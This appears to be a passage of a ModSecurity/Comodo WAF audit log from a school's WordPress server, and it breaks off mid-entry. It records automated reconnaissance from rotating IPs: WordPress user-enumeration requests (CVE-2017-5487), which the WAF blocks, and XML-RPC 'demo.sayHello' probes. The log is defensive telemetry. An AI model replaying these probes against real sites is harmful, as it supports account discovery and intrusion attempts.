X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --380f3d45-C-- demo.sayHello --380f3d45-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --380f3d45-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445002232813 5476 (- - -) Stopwatch2: 1747445002232813 5476; combined=4087, p1=545, p2=3329, p3=29, p4=31, p5=90, sr=76, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --380f3d45-Z-- --da73bc68-A-- [17/May/2025:08:23:47 +0700] aCflIxKi5m5upc8uMd6iLAAAAMU 103.236.140.4 43908 103.236.140.4 8181 --da73bc68-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.166 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --da73bc68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da73bc68-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445027695370 2837 (- - -) Stopwatch2: 1747445027695370 2837; combined=1181, p1=386, p2=770, p3=0, p4=0, p5=25, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da73bc68-Z-- --ea629164-A-- [17/May/2025:08:23:55 +0700] aCflK3yxdQCiyU1ENFcnnQAAAAo 103.236.140.4 43912 103.236.140.4 8181 --ea629164-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.166 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ea629164-C-- demo.sayHello --ea629164-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea629164-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445035307958 6632 (- - -) Stopwatch2: 1747445035307958 6632; combined=4896, p1=638, p2=3920, p3=39, p4=42, p5=145, sr=78, sw=112, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea629164-Z-- --e71e8544-A-- [17/May/2025:08:24:08 +0700] aCflOATOsBn9MSWb6WJumwAAAJQ 103.236.140.4 43918 103.236.140.4 8181 --e71e8544-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.193 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e71e8544-C-- demo.sayHello --e71e8544-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e71e8544-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445048473569 4803 (- - -) Stopwatch2: 1747445048473569 4803; combined=3717, p1=454, p2=3060, p3=26, p4=25, p5=90, sr=69, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e71e8544-Z-- --e8b51d37-A-- [17/May/2025:08:24:28 +0700] aCflTHyxdQCiyU1ENFcnnwAAAAw 103.236.140.4 43922 103.236.140.4 8181 --e8b51d37-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e8b51d37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8b51d37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445068273452 2872 (- - -) Stopwatch2: 1747445068273452 2872; combined=1292, p1=419, p2=843, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8b51d37-Z-- --77c6a805-A-- [17/May/2025:08:24:34 +0700] aCflUgTOsBn9MSWb6WJunQAAAJY 103.236.140.4 43926 103.236.140.4 8181 --77c6a805-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.214 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --77c6a805-C-- demo.sayHello --77c6a805-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --77c6a805-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445074456121 6952 (- - -) Stopwatch2: 1747445074456121 6952; combined=4906, p1=666, p2=4005, p3=36, p4=41, p5=94, sr=135, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77c6a805-Z-- --3e36f879-A-- [17/May/2025:08:24:56 +0700] aCflaHyxdQCiyU1ENFcnoQAAABE 103.236.140.4 43930 103.236.140.4 8181 --3e36f879-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3e36f879-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e36f879-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445096978953 2788 (- - -) Stopwatch2: 1747445096978953 2788; combined=1255, p1=449, p2=776, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e36f879-Z-- --25887200-A-- [17/May/2025:08:25:03 +0700] aCflbxKi5m5upc8uMd6iLQAAAMY 103.236.140.4 43934 103.236.140.4 8181 --25887200-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.64 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --25887200-C-- demo.sayHello --25887200-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --25887200-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445103851855 5200 (- - -) Stopwatch2: 1747445103851855 5200; combined=3726, p1=502, p2=3029, p3=30, p4=31, p5=80, sr=65, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25887200-Z-- --8a96ab67-A-- [17/May/2025:08:25:07 +0700] aCflcwTOsBn9MSWb6WJunwAAAJg 103.236.140.4 43936 103.236.140.4 8181 --8a96ab67-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8a96ab67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a96ab67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445107190344 2828 (- - -) Stopwatch2: 1747445107190344 2828; combined=1228, p1=429, p2=766, p3=0, p4=0, p5=33, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a96ab67-Z-- --343f1251-A-- [17/May/2025:08:25:12 +0700] aCfleATOsBn9MSWb6WJuoQAAAIM 103.236.140.4 43942 103.236.140.4 8181 --343f1251-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.160 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --343f1251-C-- demo.sayHello --343f1251-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --343f1251-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445112127377 5274 (- - -) Stopwatch2: 1747445112127377 5274; combined=3962, p1=513, p2=3235, p3=29, p4=32, p5=91, sr=72, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --343f1251-Z-- --4eedc847-A-- [17/May/2025:08:25:14 +0700] aCflenyxdQCiyU1ENFcnowAAABI 103.236.140.4 43946 103.236.140.4 8181 --4eedc847-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.15.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.15.164 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4eedc847-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4eedc847-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445114968003 2098 (- - -) Stopwatch2: 1747445114968003 2098; combined=1051, p1=365, p2=660, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4eedc847-Z-- --68bba777-A-- [17/May/2025:08:25:15 +0700] aCfle3yxdQCiyU1ENFcnpAAAABM 103.236.140.4 43948 103.236.140.4 8181 --68bba777-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --68bba777-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68bba777-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445115769630 2706 (- - -) Stopwatch2: 1747445115769630 2706; combined=1273, p1=424, p2=816, p3=0, p4=0, p5=33, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68bba777-Z-- --475aec7a-A-- [17/May/2025:08:25:20 +0700] aCflgHyxdQCiyU1ENFcnpQAAABQ 103.236.140.4 43954 103.236.140.4 8181 --475aec7a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.15.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.15.164 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --475aec7a-C-- demo.sayHello --475aec7a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --475aec7a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445120516607 5270 (- - -) Stopwatch2: 1747445120516607 5270; combined=3941, p1=503, p2=3224, p3=29, p4=33, p5=91, sr=73, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --475aec7a-Z-- --4f428c34-A-- [17/May/2025:08:25:22 +0700] aCflghKi5m5upc8uMd6iLwAAAMk 103.236.140.4 43956 103.236.140.4 8181 --4f428c34-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.168 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4f428c34-C-- demo.sayHello --4f428c34-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f428c34-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445122955611 5068 (- - -) Stopwatch2: 1747445122955611 5068; combined=3842, p1=428, p2=3200, p3=22, p4=23, p5=97, sr=74, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f428c34-Z-- --290a1b32-A-- [17/May/2025:08:25:27 +0700] aCflh3yxdQCiyU1ENFcnpgAAABU 103.236.140.4 43962 103.236.140.4 8181 --290a1b32-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.253 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --290a1b32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --290a1b32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445127910946 2621 (- - -) Stopwatch2: 1747445127910946 2621; combined=1192, p1=437, p2=724, p3=0, p4=0, p5=30, sr=101, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --290a1b32-Z-- --3e323b42-A-- [17/May/2025:08:25:35 +0700] aCflj3yxdQCiyU1ENFcnqAAAABg 103.236.140.4 43966 103.236.140.4 8181 --3e323b42-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.253 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3e323b42-C-- demo.sayHello --3e323b42-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e323b42-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445135285933 6529 (- - -) Stopwatch2: 1747445135285933 6529; combined=4736, p1=630, p2=3867, p3=38, p4=43, p5=95, sr=110, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e323b42-Z-- --8275012e-A-- [17/May/2025:08:25:36 +0700] aCflkHyxdQCiyU1ENFcnqQAAAAA 103.236.140.4 43968 103.236.140.4 8181 --8275012e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8275012e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8275012e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445136002792 2471 (- - -) Stopwatch2: 1747445136002792 2471; combined=1198, p1=400, p2=770, p3=0, p4=0, p5=28, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8275012e-Z-- --1e769d4f-A-- [17/May/2025:08:25:44 +0700] aCflmATOsBn9MSWb6WJupwAAAIw 103.236.140.4 43974 103.236.140.4 8181 --1e769d4f-B-- GET 